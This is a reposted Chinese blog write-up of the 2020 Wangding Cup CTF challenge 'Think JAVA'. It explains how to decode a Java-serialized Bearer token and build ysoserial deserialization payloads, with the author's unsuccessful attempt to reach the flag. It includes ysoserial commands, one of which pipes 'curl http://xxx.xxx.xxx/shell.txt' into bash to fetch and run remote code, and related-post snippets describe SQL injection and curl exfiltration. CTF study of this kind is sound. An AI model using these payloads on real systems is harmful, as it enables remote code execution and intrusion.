朱雀JAVA游戏_[网鼎杯2020朱雀组]Think JAVA

最新推荐文章于 2023-07-20 17:06:22 发布
最新推荐文章于 2023-07-20 17:06:22 发布
阅读量249 收藏
点赞数
文章标签: 朱雀JAVA游戏
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36087895/article/details/114824739
版权

前言

现在算是取得了很大的希望。但此题必有玄机。

c29df9e7d062aae6a15f74638d11355e.png

这就是朱雀组31解的题,tqllllllllllll。

下面是现在的功效,然则我照样没能拿到flag……菜,枯了。

9cd3ae1669fc8ac5f43712634e660458.png

742a33a7b53374649ae6709a7b0b9666.png

进入正题

下方截图算是hint , 固然对于没有用过swagger-ui的 ,照样不算hint的叭(我都是问的大佬)。

e4067a3207379946c88722ece3496022.png

他是一个测试接口,我原本分享了swagger-ui的链接来着,然则现在谁人链接好像被接见炸了。

(我在文章中已经把链接删了……考虑不周,复现的时刻就只能看着没有回显的靶机,炒鸡难受)。

由于就是套的swagger-ui,以是他的路由都不会变,本题只给出一个接口的缘故原由八成就是这个意思。

我就删了,如下是我们获得的mysql字段的详细作用。

/user/login,登录获得token

先给出那时测试的截图(大佬截给我的)。

b32066dfd6dcc75b0685cda3b9bc8003.png

流程的剖析:

此login接口用来模拟登录,登录乐成后可以获得一串data数据。部门数据可参考上图箭头所指。

下面做题得时刻,用post传参的截图(看到登录乐成的时刻,照样很开心的)。

3045b6640e9e4c7611daa3f63c548a7b.png

0efd2eeedf46e56fc7616b710500f9fd.png

可以参考这段json数据。

{

"data": "Bearer rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu",

"msg": "登录乐成",

"status": 2,

"timestamps": 1589814544730

}

对token数据举行处置剖析

第一步,提取出序列化的数据

data对应的一串字符是Bearer token。

这串数据需要先base64,然后转成16进制。不要复制出来base64的内容再转16进制,直接用python2一步到位。

#此处使用python2

import base64

a = "rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu"

b = base64.b64decode(a).encode('hex')

print(b)

我一下昼看了许多文章,有两点很主要。

下方的特征可以作为序列化的标志参考:

一段数据以rO0AB开头,你基本可以确定这串就是JAVA序列化base64加密的数据。

或者若是以aced开头,那么他就是这一段java序列化的16进制。

我的部门运行效果参考(aced开头)。

477dde4b938796de3ff48e6b786ed457.png

第二步,剖析序列化数据

用到工具SerializationDumper来剖析数据

用法:

java -jar SerializationDumper-[*version*].jar [*16进制数据*)]

输出的详细的字段代表的内容,一知半解也就不掺和了 。

(运行效果截图)

8a4dc9b859a659b1c57e6ab9dae9a38b.png

最下方有这样一段包含着admin字段,它就相当于保存着实质信息的数据块。

admin就是用户名。(我是这么以为)

0fcbf2c89f8e946f6e72e338151e02c5.png

寻找反序列化注入点

我们上一步已经大致剖析了data数据。

理一下思绪:

登录—》获得token—》token中data的数据是一段间接的序列化字段。

这时刻,

当我把序列化的token字段作为Authorization去印证这个UI的user/current接口。

他也会显示乐成登录。

这说明,他会在current接口举行反序列化!

那么我们可以组织合适的序列化内容来组织getshell。

若何组织

java反序列化工具ysoserial

ysoserial用法:以ROME和URLDNS举例

即用ROME(我现在的认知就是他每一种都有差别的作用,好比rome可以下令执行,URLDNS可以举行dns回显)。

java -jar ysoserial-master.jar ROME "calc.exe" > h3zh1.bin

java -jar ysoserial-master.jar URLDNS "http://xxx" > h3zh1.bin

然后要对他们举行数据处置。

下方程序python2或python3都可。

import base64

file = open("h3zh1.bin","rb")

now = file.read()

ba = base64.b64encode(now)

print(ba)

#print("Bearer "+ba) #可以解注释此段,并注释上一条print,便于快速测试

file.close()

注重检查输出的内容啊是否是rO0AB,若是差的许多,那么往回去看看叭。

脑壳疼

我弹shell的时刻没有乐成,很难受。测试了好几个都没成,难受死了。

我的废柴payload:

java -jar ysoserial-master.jar ROME "curl http://xxx.xxx.xxx/shell.txt|bash" > h3zh1.bin

最近的一步就是可以检测到curl的执行。又卡住了,不外差不多也算完结了吧。

眼睁睁看着三位大佬一个个把题Kill了,自闭了,早上起来了去讨教他们叭……。

睡觉。。。。。。。

a331afa09d4814dafce49e595a56e3f2.png

参考链接:

原文链接:https://www.cnblogs.com/h3zh1/p/12914439.html

本站声明:网站内容来源于网络,若有侵权,请联系我们,我们将及时处置。

Can Li
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,web。web题为thinkjava
网鼎杯 2020 朱雀】Think Java
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
04-08 4736
网鼎杯 2020 朱雀】Think Java 首先下载题目附件,是一些.class文件,反编译查看。 注意到引入的其中一个包: import io.swagger.annotations.ApiOperation; Swagger Swagger 是一个规范和完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。总体目标是使客户端和文件系统作为服务器以同样的速度来更新。文件的方法,参数和模型紧密集成到服务器端的代码,允许API来始终保持同步。 Swagger UI 提供了
[网鼎杯 2020 朱雀]Think Java
Sk1y的博客
04-07 1995
[网鼎杯 2020 朱雀]Think Java 文章目录[网鼎杯 2020 朱雀]Think Java获取源文件SwaggerJDBC sql注入关于#的使用查看数据库名字获取表名获取字段名获取字段值对序列化字符串分析java Deserialization Scanner插件使用ysoserialcurl将flag带出来反弹shell参考文章 获取源文件 下载jar包,扔进jd-gui查看源码 主要是4个文件 Test.java 接收dbName参数,然后调用getTableData方法 packa
网鼎杯2020朱雀-web(Think Java)
weixin_43610673的博客
05-19 2463
下载class.zip解压后用jd-gui查看源码,我是用jd-gui弄出来然后sublime看的 在/common/test/sqlDict有个注入 主要是SqlDict.class 下面注入即可dbName=myapp?useUnicode=true’union/**/select/**/1 这里用post或者get提交都行 dbName=myapp?useUnicode=true'union/**/select/**/group_concat(SCHEMA_NAME)from(informati
2022网鼎杯初赛朱雀赛题
10-18
2022网鼎杯初赛朱雀赛题
网鼎2020-朱雀.rar
05-24
网鼎2020-朱雀.rar除了web题
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
09-11
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
zhuque:朱雀-LeetCode刷题
04-08
朱雀     LeetCode刷题
Ctfhub-think_java-2020网鼎杯-朱雀
weixin_54227009的博客
12-27 446
唉,做ctfhub这道题的时候,发现网上几乎都是跟风用的这个命令来直接读取根目录下的flag,我看了buuctf上的这道题因为flag就在跟目录下,flag的名称并没有变化,故可以直接读到flag。但ctfhub上这道题,题目已经提示了flag在根目录下,且flag名字是随机的,故用该方法并不能直接读取到flag,所以只有反弹shell的命令来cat flag。
【CTF】java反序列-2020-网鼎杯-朱雀-Web-think_java
(∪.∪ )...zzz的博客
06-13 3535
看目录!读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里swagger开发接口login输入用户名密码得到返回数据包user current 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 (这个包抓错了,所以没有显示密码) /common/test/sqlDict dbName=myapp?a=’ union select (select pwd from user)# “tableDescribe”:“ctfhub_8978
CTFHUB-think_java(2020-网鼎杯-朱雀-Web-think_java)
qq_51953382的博客
07-20 307
将编码后的内容填充到命令上,再通过ysoserial获得bin文件,拿到文件之后,我们还需要对其进行base64加密,这里使用的一个Python脚本。但是这是网鼎杯原题的payload,那个题目中flag名称就是flag,是不变的所以可以这么用,通过-d @来提取flag文件内容然后发到自己服务器。获得payload之后,先在咱们的服务器上监听端口之后,在另一个接口处输入payload,来进行反弹shell,注意开头的Bearer保留。进入之后,将我们的得到的信息输入登录实例,来进行调用。
网鼎杯2020朱雀-web
ChenZIDu的博客
05-18 2984
nmap那题就基本命令然后还有一个别的方法。 nmap 源码 index.php <? require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ di
[网鼎杯 2020 朱雀]phpweb
satasun的博客
10-14 331
解题过程如下 抓包 进来的页面不对劲,虽然不知道什么梗但是有一说一确实丑,如果注意一下还会发现这个页面在不断刷新,先抓个包看看。 发现这里上传了两个参数,分别是func和p。 获取源码 func猜测是function,p应该是payload(猜的),那么简单明了的东西应该是一个调用func上传的函数名,参数采用p传上来的参数。于是构造: func=file_get_contents&p=index.php 源码: <?php $disable_fun = array("exec"
网鼎杯2020 朱雀部分writeup
yusakul的博客
05-19 1499
Reverse –go 替换了base64字典 解题思路: 程序将我们输入的key,经过换了编码字典的base64加密后,去掉最后==,计算key加密后的长度,长度为0x16,就开始解密。那么我们只需要输入正确的key就有flag了,知道了base64加密字典XYZFGHI2+/Jhi345jklmEnopuvwqrABCDKL6789abMNWcdefgstOPQRSTUVxyz01,和密文nRKKAHzMrQzaqQzKpPHClX==,解密如下: Reverse –tree 解题思路:
第二届网鼎杯(第三场:朱雀)Think Java
a3320315的博客
05-20 1675
首先题目给了一些class文件,这些不需要多说,直接jd-gui反编译或者使用fernflower反编译也可以 解题过程 先扫一下目录 得到swagger-ui.html 发现几个api接口 sql注入得到密码 源代码中明显存在SQL注入(dbName可控),但是必须满足两个条件,否则不能连接数据库 #号在引号里面时当做填充符,没有实际意义(这个只是在jdbc中这样?还没来得及验证) 最终: jdbc:mysql://mysqldbserver:3306/myapp#‘ union select
计算机专业毕业设计范例845篇jsp2118基于Web停车场管理系统的设计与实现_Servlet_MySql演示录像.rar
05-24
博主给大家详细整理了计算机毕业设计最新项目,对项目有任何疑问(部署跟文档),都可以问博主哦~ 一、JavaWeb管理系统毕设项目【计算机毕设选题】计算机毕业设计选题,500个热门选题推荐,更多作品展示 计算机毕业设计|PHP毕业设计|JSP毕业程序设计|Android毕业设计|Python设计论文|微信小程序设计
Windows 10 平台 FFmpeg 开发环境搭建 博客资源
最新发布
05-24
【FFmpeg】Windows 10 平台 FFmpeg 开发环境搭建 ④ ( FFmpeg 开发库内容说明 | 创建并配置 FFmpeg 项目 | 拷贝 DLL 动态库到 SysWOW64 目录 ) https://hanshuliang.blog.csdn.net/article/details/139172564 博客资源 一、FFmpeg 开发库 1、FFmpeg 开发库编译 2、FFmpeg 开发库内容说明 二、创建并配置 FFmpeg 项目 1、拷贝 dll 动态库到 C:\Windows\SysWOW64 目录 - 必须操作 特别关注 2、创建 Qt 项目 - C 语言程序 3、配置 FFmpeg 开发库 - C 语言项目 4、创建并配置 FFmpeg 开发库 - C++ 项目
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值